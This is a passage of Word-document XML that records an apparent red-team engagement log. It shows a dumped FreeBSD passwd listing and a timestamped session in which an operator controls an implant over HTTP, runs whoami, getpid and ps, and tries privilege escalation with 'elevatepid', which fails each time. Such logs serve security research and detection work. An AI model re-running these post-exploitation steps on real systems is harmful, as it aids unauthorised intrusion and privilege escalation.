    <w:p w14:paraId="399C0ADE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3259A810" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3491373E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42011FAA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402883F1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ntpd:*:123:123:NTP Daemon:/var/db/ntp:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5A7D74" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438BC13A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380B219" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3D55BA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>darpa:*:1001:1001:DARPA:/home/darpa:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0EA8F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bbn:*:1002:1002:bbn:/home/bbn:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7426BA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE8D1A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36780EFD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E3D328" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2877CD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>polkitd:*:565:565:Polkit Daemon User:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488DE3E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>colord:*:970:970:colord color management daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C2EA82" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>git_daemon:*:964:964:git daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB4BF9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kafka:*:234:234:Apache Kafka user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E8BFC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D3E8D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pgsql:*:70:70:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7598A9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta3:*:1003:1003:TA3 User,None,None,None:/home/ta3:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E8BE6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta1:*:1004:1004:TA1 User,None,None,None:/home/ta1:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F9BDCF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin:*:1005:1005:Admin,None,None,None:/home/admin:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F3A470" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>user:*:1006:1006:User,None,None,None:/home/user:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8284B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>iswitcher:*:1007:1007:Internet Switcher Service,None,None,None:/home/iswitcher:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E834A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6F70A5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A413DB7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E94BCD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DEBC3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1         128.55.12.66:49267 --&gt;   128.55.12.167:8640  [HTTP]  Fri May 17 13:01:31 2019        active 1486s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091A6E16" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con W1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDF817" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2369BE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C5A43" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513FBE0A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156A6F96" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F477AD3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] pid: 2768</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FC65E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;elevatepid '\\.\regmon' 2768</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA9FC8E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate process [\\.\regmon] [2768]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4ACFD0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate failed with status -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A13650F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Did you install the elevate driver before running the elevate command?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1518CC17" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A4773" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6973F059" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD883FD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C4BD6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">W1&gt;elevatepid \\\\.\\regmon 2768                                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A064329" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate process [\\.\regmon] [2768]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B3D61" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate failed with status -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7EA900" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Did you install the elevate driver before running the elevate command?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78263B17" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;elevatepid \\.\regmon 2768</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB5D63E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate process [\.regmon] [2768]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E8F025" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate failed with status -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51C3BC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Did you install the elevate driver before running the elevate command?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCEECB9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465C3E7D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD60D9C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] pid                                      process                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD50F76" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*]  0                                      &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BEEA06" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*]  4                                      &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424BEF3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 252                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BE30CB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 340                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B629E48" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 388                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F1562" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 400                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C439B9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 436                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE76857" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 484                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719AAE70" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 492                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562300E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 500                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6DF29" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 592                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0BECAF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 668                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57839F4F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 736                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F837A34" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 820                                     &lt;unknown&gt;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F41B4C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 868                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC7F692" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 904                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B0F37" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 964                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70937217" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 756                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638CD6A3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1072                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1315D7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1104                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50399ECA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1192                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D8260" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1228                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF724B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1276                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596083C8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1344                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC7602" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1408                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01380937" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1452                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC63854" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1492                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186BD4F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1532                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD51277" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1752                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832552B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1964                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFA28DC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2044                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE82C0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1264                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEAB8EC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
